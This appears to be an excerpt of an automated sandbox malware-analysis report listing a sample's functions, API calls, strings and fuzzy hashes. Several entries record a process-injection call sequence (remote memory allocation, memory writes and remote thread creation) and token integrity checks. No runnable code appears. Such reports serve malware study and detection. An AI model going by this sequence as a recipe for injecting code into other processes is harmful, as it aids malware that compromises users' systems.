                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                                    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                    • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                                    • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                                    Function 00401C70 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                                    • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                    • String ID: .dll$kernel
                                                                                                                                                                                                                    • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                    • Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                                    • Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9
                                                                                                                                                                                                                    Function 004033A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004033A9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                    • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                    • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                    • Opcode ID: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
                                                                                                                                                                                                                    • Instruction ID: 021f6ab0fc676138f4263539a703c8a5ee641fdd4e06072bb68a67a5c5d36617
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E0188B5E00208EBEB20CFA0DD09B9A7BBCAB85701F4040A5E709B6280D6749F44CF75
                                                                                                                                                                                                                    Function 00422380 Relevance: .8, Instructions: 833COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
                                                                                                                                                                                                                    • Instruction ID: a443a6be7b6020440c066dd6ac9f13e6f3c101328c6206cdfb6017cdb3c45d4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 406217302042629FE715DF349EA8AAB7BE5EF9A300F44C959E885C7331DB74C909C799
                                                                                                                                                                                                                    Function 0044599D Relevance: .8, Instructions: 789COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
                                                                                                                                                                                                                    • Instruction ID: 4c2327c6d9ea0fd5f78b0127e51354d19f4113b4e822ec877585a6efb92c7c58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD62BC70E00A269BEB0CCF55C4906EDBBB2FF85311F24826EC81667B85D778A955CF84
                                                                                                                                                                                                                    Function 00433980 Relevance: .7, Instructions: 675COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
                                                                                                                                                                                                                    • Instruction ID: 31199357ceec466129956888dd439b1d4a6f100edec160316ecfa63dcdc1427f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B42D371A002199FDB10DFA9C881AEFB7B1BF88304F54556EE446A7342D738BD45CBA8
                                                                                                                                                                                                                    Function 00443BB0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                                    • Instruction ID: eac5d11cb92673f9bb66abbec7de51b37a046753e49d1a185180b8ac7a31a903
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D122630A047859FEB25CF18C9806AEB7F1AF96710F14855FE4A68B391C738EE46CB54
                                                                                                                                                                                                                    Function 00444280 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                                    • Instruction ID: 021bb5d2b7c0cb56e537b8d227e73ed21d0ebdb26bc59c524461a715ef61eba8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC12F630A047849FEB15CF28C9807AEBBF1AF96314F14855EE8A64B791C738ED42CB54
                                                                                                                                                                                                                    Function 004434E0 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                                    • Instruction ID: c4f7584d98bb462e22f8ca5efa45b381d380756b5cf0509a019ae382a9018600
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1121570A007859FEB25CF18C9806AEBBF1AF96711F14855FE4A68B351C738EE42CB54
                                                                                                                                                                                                                    Function 00442250 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                                    • Instruction ID: b7b9f9f22af13d42a5b6316f7f2a44174fcb43b43f91c23f0d1d097708033df0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F312E530A047859FEB25CF28CA8069A7BF1BF56310F54855EF8A58B381C778ED42CB64
                                                                                                                                                                                                                    Function 00440A60 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                                    • Instruction ID: c96630ca6486ca8a3dffba479f0708cf21e85e20dbdd268f71493559b7ccfc47
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91021630A007459FEB24CF18C9806AFB7E1EF91314F14856FE9A68B391D738AD56C798
                                                                                                                                                                                                                    Function 0043FE00 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
                                                                                                                                                                                                                    • Instruction ID: b5c27d84d61b241dfbbeb53c51d0fdd6cf76b480a9746a7cf7f6d71d37627bea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1702F330A007459FEB20CF28C9816AF77E1BF96310F14856FE9A58B391D738AD56CB94
                                                                                                                                                                                                                    Function 004416C0 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
                                                                                                                                                                                                                    • Instruction ID: 5c11e9432c662da9e832bb00048f610cc01de9b2e0be984bbf0aa46c625adfee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE02E630A007459FEB24CF18C9916AFB7E1EF92310F14855FE4A69B3A1D738A982C759
                                                                                                                                                                                                                    Function 0043F190 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
                                                                                                                                                                                                                    • Instruction ID: 6f27e782664b546ea9a7b70d93e541e4de47497114ddd59825f0d455be94bf6b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE02F430E007459FDB24CF28C581AAF77E1AF99310F14956FE8A58B391D738AD4ACB94
                                                                                                                                                                                                                    Function 00408FB0 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 88621d46758aedf690ac812344085eee3c67f3b628deeb412a6ed4927ae68baa
                                                                                                                                                                                                                    • Instruction ID: e4885def972384e71c6d3d4fa2c3ca7822b4fe2f95aa3e637cc98f64f0d57cdc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88621d46758aedf690ac812344085eee3c67f3b628deeb412a6ed4927ae68baa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93F19B71A0021AABDB20CF98C984BAFB7B5EF88314F14417AED05A7381D779DD41CBA5
                                                                                                                                                                                                                    Function 004386F0 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 2e8fd1392c8e8ca8671e57119c901ec34dab3edcf339fcd96841df010c3a8279
                                                                                                                                                                                                                    • Instruction ID: fb58a9955cc4d1b946931b1175dba42f0bbce99fa4b1ebf213060499804b6f98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e8fd1392c8e8ca8671e57119c901ec34dab3edcf339fcd96841df010c3a8279
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 991236B1E002198FCF18CF99C9905ADFBF2BF98314F18916EE849AB754D738A941CB54
                                                                                                                                                                                                                    Function 0043E340 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: fda3bc7136fad63692ea13eb0df83ff4ace332ecd58bb5a45ea7b06bc79ff9bd
                                                                                                                                                                                                                    • Instruction ID: f84bb95602b786eda625d293fa24169cae21de97630f021d2562301d3a5a23f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fda3bc7136fad63692ea13eb0df83ff4ace332ecd58bb5a45ea7b06bc79ff9bd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58E18A309067859FDB25CF2AC8816BE7BE1AF6A314F14816FD4E54B3C1C638AD46CB48
                                                                                                                                                                                                                    Function 00448360 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 67012e555016796dca32be15a4a4708593d4b9cfb006d1ee6d7d65e73d46c3ae
                                                                                                                                                                                                                    • Instruction ID: d50c75c3876421525f344fdd73dc0d94e20a485c8d9004176434aa332c09f1d1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67012e555016796dca32be15a4a4708593d4b9cfb006d1ee6d7d65e73d46c3ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E1F530A045558FDB08CF68C8806ADBBF2EF85314B29C1AED895DB346DA39DA46CB54
                                                                                                                                                                                                                    Function 00439B90 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e42fcb3eab6dfdb7d92a05da4ca5687e3eaacf820ae962d547ea67b0616ab27e
                                                                                                                                                                                                                    • Instruction ID: 225706b8245442841e5fafbb32bd6a2fabd71da86d83268e1d7ace3ee5cdc439
